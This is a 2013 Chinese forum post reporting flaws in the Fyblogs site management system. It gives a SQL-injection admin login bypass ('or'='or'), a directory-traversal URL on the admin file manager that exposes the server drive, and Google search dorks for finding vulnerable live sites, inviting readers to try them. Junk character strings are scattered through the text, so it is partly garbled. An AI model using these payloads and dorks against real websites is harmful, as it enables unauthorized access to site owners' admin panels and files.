漏洞类型: 未授权访问/权限绕过
+ P5 F3 ?) c' I/ [. ^ m( W8 t/ I& e5 L J+ g( U/ B3 T
简要描述:8 o9 n, h) j5 ?# O
8 {8 b/ |6 g: p0 D7 h* v( J
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
6 c1 }5 @; l, d+ R) ^4 c$ ~6 P) _- c: [) P8 ^' g7 P4 d0 ~# f
详细说明:
* ]+ e5 p. ~2 E6 q
% E5 V5 d% Z. g5 J- m& o- Z后台万能密码 'or'='or'
2 r1 \; l& @1 X+ S6 d+ g后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!7 E9 K6 |# X ]6 \
admin/uploadfile.asp?currentFolder=/upfiles/../2 q# b9 u+ o' ~8 }! \
- h; N/ n2 @$ ~+ P( H8 h2 r
漏洞证明:
5 @- M) ^2 n$ v; j! E) y; X% d
( |. a) L+ c& x+ k谷歌:inurl:type.asp?id=1 新闻中心
' T1 p" S4 g$ I* w' k或者 :inurl:download_ok.asp?% t; @) M% x+ H6 P6 T3 f
& b' w# }& v- y" Y9 \, p, O$ i
可以测试; u s8 b6 l4 _# W1 g, \
1 I& L' e( W* e+ x; b) }$ ?
: ?# Y+ W- H2 m" }" e8 \
|
发表于 2013-3-7 13:07:46
收藏
支持
反对